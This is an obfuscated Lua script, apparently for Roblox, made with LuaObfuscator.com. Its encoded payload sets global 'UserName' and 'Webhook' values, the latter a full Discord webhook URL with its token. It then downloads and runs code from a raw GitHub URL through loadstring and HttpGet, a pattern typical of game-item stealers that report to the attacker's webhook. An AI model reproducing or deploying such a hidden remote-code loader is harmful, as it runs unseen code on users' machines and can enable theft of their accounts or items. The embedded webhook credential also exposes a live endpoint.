--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v96=v5(v83,v19);v19=nil;return v96;else return v83;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(((1640 -(1523 + 114)) -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v84-(v84%(569 -(330 + 37 + 201))) ;else local v85=((1323 -394) -(214 + 713))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (877 -(282 + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (12 -(966 -(892 + 65))) );v18=v18 + (121 -(32 + 85)) ;return (v40 * (16441815 + 335401)) + (v39 * 65536) + (v38 * (57 + (474 -275))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=(1 -0) -(0 + 0) ;local v44=(v20(v42,1 -0 ,370 -(87 + 263) ) * ((182 -(67 + 113))^32)) + v41 ;local v45=v20(v42,37 -16 ,23 + 8 + 0 );local v46=((v20(v42,78 -(837 -(368 + 423)) )==1) and  -(1 + 0)) or (3 -(6 -4)) ;if (v45==0) then if (v44==(952 -((820 -(10 + 8)) + 150))) then return v46 * (0 -0) ;else local v89=0 -0 ;while true do if (v89==(0 + (0 -0))) then v45=1;v43=997 -(915 + 82) ;break;end end end elseif (v45==(5796 -3749)) then return ((v44==(0 + 0)) and (v46 * (1/(0 -0)))) or (v46 * NaN) ;end return v8(v46,v45-(2210 -(1069 + 118)) ) * (v43 + (v44/(((446 -(416 + 26)) -2)^52))) ;end local function v25(v47)local v48;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=v3(v16,v18,(v18 + v47) -1 );v18=v18 + v47 ;local v49={};for v65=1 + 0 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v50=0 -0 ;local v51;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v50~=4) then else while true do if (v51==2) then local v94=0 + 0 ;while true do if ((1 -0)~=v94) then else v51=1 + 2 ;break;end if (v94==(560 -(306 + 254))) then v56=nil;v57=nil;v94=1;end end end if (0==v51) then v52=0;v53=nil;v51=1;end if (v51==3) then v58=nil;while true do if (v52==(1 + 0)) then local v109=0 -0 ;while true do if (v109==0) then local v126=0;while true do if (v126==(1468 -(899 + 568))) then v109=1;break;end if (v126==0) then v57=v23();v58={};v126=1;end end end if (v109~=2) then else v52=2;break;end if (v109==(1 + 0)) then local v127=0 -0 ;while true do if (v127~=(604 -(268 + 335))) then else v109=292 -(60 + 230) ;break;end if (v127==(572 -(426 + 146))) then for v164=1,v57 do local v165=0;local v166;local v167;local v168;while true do if (v165==1) then v168=nil;while true do if (v166==1) then if (v167==(1 + 0)) then v168=v21()~=(1456 -(282 + 1174)) ;elseif (v167==2) then v168=v24();elseif (v167==3) then v168=v25();end v58[v164]=v168;break;end if (v166==(811 -(569 + 242))) then local v171=0;while true do if (v171==(0 -0)) then local v179=0;while true do if ((0 + 0)==v179) then v167=v21();v168=nil;v179=1025 -(706 + 318) ;end if (v179==1) then v171=1252 -(721 + 530) ;break;end end end if (1~=v171) then else v166=1272 -(945 + 326) ;break;end end end end break;end if (v165~=0) then else v166=0 -0 ;v167=nil;v165=1 + 0 ;end end end v56[3]=v21();v127=701 -(271 + 429) ;end end end end end if (v52==2) then local v110=0;while true do if (v110==(1 + 0)) then return v56;end if (v110~=(1500 -(1408 + 92))) then else for v128=1087 -(461 + 625) ,v23() do local v129=0;local v130;local v131;local v132;while true do if (v129==0) then v130=0;v131=nil;v129=1;end if (v129==(1289 -(993 + 295))) then v132=nil;while true do if (v130==1) then while true do if (v131~=0) then else v132=v21();if (v20(v132,1 + 0 ,1172 -(418 + 753) )~=(0 + 0)) then else local v172=0 + 0 ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (v172==(1 + 0)) then v175=nil;v176=nil;v172=1 + 1 ;end if (v172==3) then while true do if (v173~=0) then else local v180=529 -(406 + 123) ;while true do if (v180==0) then v174=1769 -(1749 + 20) ;v175=nil;v180=1 + 0 ;end if (v180==(1323 -(1249 + 73))) then v173=1 + 0 ;break;end end end if (v173~=1) then else local v181=1145 -(466 + 679) ;while true do if (v181==1) then v173=4 -2 ;break;end if (v181==0) then v176=nil;v177=nil;v181=2 -1 ;end end end if (v173==(1902 -(106 + 1794))) then v178=nil;while true do if (0~=v174) then else local v182=0 + 0 ;local v183;while true do if (0==v182) then v183=0;while true do if (v183~=1) then else v174=1;break;end if (0==v183) then local v192=0;while true do if ((0 + 0)~=v192) then else v175=0;v176=nil;v192=1;end if (1==v192) then v183=2 -1 ;break;end end end end break;end end end if (v174~=1) then else local v184=0 -0 ;local v185;while true do if (v184==0) then v185=114 -(4 + 110) ;while true do if (v185~=1) then else v174=586 -(57 + 527) ;break;end if (v185==0) then local v193=1427 -(41 + 1386) ;while true do if ((104 -(17 + 86))==v193) then v185=1;break;end if (v193==(0 + 0)) then v177=nil;v178=nil;v193=1;end end end end break;end end end if (v174~=(3 -1)) then else while true do if (v175==2) then local v186=0;while true do if (v186==1) then v175=8 -5 ;break;end if (v186==0) then local v194=166 -(122 + 44) ;local v195;while true do if (v194~=(0 -0)) then else v195=0 -0 ;while true do if (1==v195) then v186=1 + 0 ;break;end if (v195~=(0 + 0)) then else local v200=0;while true do if (v200==(0 -0)) then if (v20(v177,66 -(30 + 35) ,1)~=1) then else v178[2 + 0 ]=v58[v178[2]];end if (v20(v177,2,2)==(1258 -(1043 + 214))) then v178[3]=v58[v178[11 -8 ]];end v200=1213 -(323 + 889) ;end if (v200==1) then v195=2 -1 ;break;end end end end break;end end end end end if (v175==(583 -(361 + 219))) then if (v20(v177,3,3)~=1) then else v178[324 -(53 + 267) ]=v58[v178[4]];end v53[v128]=v178;break;end if (v175==1) then local v188=0;while true do if (v188~=0) then else local v196=0;while true do if (v196==(1 + 0)) then v188=414 -(15 + 398) ;break;end if (v196~=0) then else v178={v22(),v22(),nil,nil};if (v176==(0 + 0)) then local v197=850 -(20 + 830) ;local v198;local v199;while true do if (v197==(0 + 0)) then local v202=0;while true do if (v202~=(127 -(116 + 10))) then else v197=1 + 0 ;break;end if (v202~=(738 -(542 + 196))) then else v198=0;v199=nil;v202=1 -0 ;end end end if (v197==(1 + 0)) then while true do if (v198==(0 + 0)) then v199=0 + 0 ;while true do if (0~=v199) then else v178[3]=v22();v178[10 -6 ]=v22();break;end end break;end end break;end end elseif (v176==1) then v178[3]=v23();elseif (v176==(4 -2)) then v178[1554 -(1126 + 425) ]=v23() -((407 -(118 + 287))^(62 -46)) ;elseif (v176==3) then local v208=0;local v209;while true do if (v208==(1121 -(118 + 1003))) then v209=0 -0 ;while true do if (v209==0) then v178[380 -(142 + 235) ]=v23() -(2^16) ;v178[18 -14 ]=v22();break;end end break;end end end v196=1;end end end if (v188~=(1 + 0)) then else v175=2;break;end end end if ((977 -(553 + 424))==v175) then local v189=0 -0 ;while true do if (v189~=0) then else v176=v20(v132,2,3);v177=v20(v132,4 + 0 ,6 + 0 );v189=1 + 0 ;end if (v189==(1 + 0)) then v175=1;break;end end end end break;end end break;end end break;end if (v172~=(2 + 0)) then else v177=nil;v178=nil;v172=3;end if (v172==0) then v173=0 -0 ;v174=nil;v172=1;end end end break;end end break;end if ((0 -0)~=v130) then else local v169=0;while true do if (v169==0) then v131=0;v132=nil;v169=2 -1 ;end if (v169==1) then v130=1 + 0 ;break;end end end end break;end end end for v133=1,v23() do v54[v133-(4 -3) ]=v28();end v110=754 -(239 + 514) ;end end end if (v52~=(0 + 0)) then else v53={};v54={};v55={};v56={v53,v54,nil,v55};v52=1203 -(373 + 829) ;end end break;end if (v51==(732 -(476 + 255))) then local v95=1130 -(369 + 761) ;while true do if (v95==0) then v54=nil;v55=nil;v95=1;end if (v95==1) then v51=2 + 0 ;break;end end end end break;end if ((1 -0)==v50) then v53=nil;v54=nil;v50=2;end if (v50==3) then v57=nil;v58=nil;v50=7 -3 ;end if (v50==(238 -(64 + 174))) then v51=0 + 0 ;v52=nil;v50=1;end if (2==v50) then v55=nil;v56=nil;v50=3;end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=4) then if (v80<=1) then if (v80>0) then local v97=v79[2];local v98,v99=v70(v77[v97](v13(v77,v97 + 1 ,v79[3])));v72=(v99 + v97) -1 ;local v100=0;for v111=v97,v72 do v100=v100 + 1 ;v77[v111]=v98[v100];end else v77[v79[2]]=v79[3];end elseif (v80<=2) then v77[v79[2]]=v79[3]~=0 ;elseif (v80==3) then local v114=v79[2];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));else local v116=0;local v117;local v118;while true do if (v116==3) then v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v116=4;end if (4==v116) then v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v116=5;end if (5==v116) then v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]]=v61[v79[3]];v116=6;end if (v116==6) then v71=v71 + 1 ;v79=v67[v71];v118=v79[2];v117=v77[v79[3]];v116=7;end if (v116==2) then v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v116=3;end if (v116==1) then v79=v67[v71];v77[v79[2]][v79[3]]=v79[4];v71=v71 + 1 ;v79=v67[v71];v116=2;end if (v116==8) then v77[v79[2]]=v79[3];break;end if (v116==0) then v117=nil;v118=nil;v77[v79[2]]=v61[v79[3]];v71=v71 + 1 ;v116=1;end if (v116==7) then v77[v118 + 1 ]=v117;v77[v118]=v117[v79[4]];v71=v71 + 1 ;v79=v67[v71];v116=8;end end end elseif (v80<=6) then if (v80>5) then do return;end else v77[v79[2]]=v61[v79[3]];end elseif (v80<=7) then local v106=0;local v107;local v108;while true do if (v106==1) then v77[v107 + 1 ]=v108;v77[v107]=v108[v79[4]];break;end if (v106==0) then v107=v79[2];v108=v77[v79[3]];v106=1;end end elseif (v80==8) then v77[v79[2]]();else v77[v79[2]][v79[3]]=v79[4];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365724E616D6503073O0053696D70616E3103093O00557365724E616D653203083O0053696D7073616E3103073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O3132363137333638332O3230362O342O362F4579694C736D754A44533O62655A5955586163446E486B4E6156694664765250586B5864775A3735737163374365465165344C557237595346356E2D6B4672546C304D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4C7970686572585A63726970742F6D61696E2F4C797068657253637269707473000F3O0012043O00013O00304O0002000300124O00013O00304O0004000500124O00013O00304O0006000700124O00083O00122O000100093O00202O00010001000A00122O0003000B4O0002000400014O0001000100044O00035O00022O00083O000100012O00063O00017O00",v9(),...);end
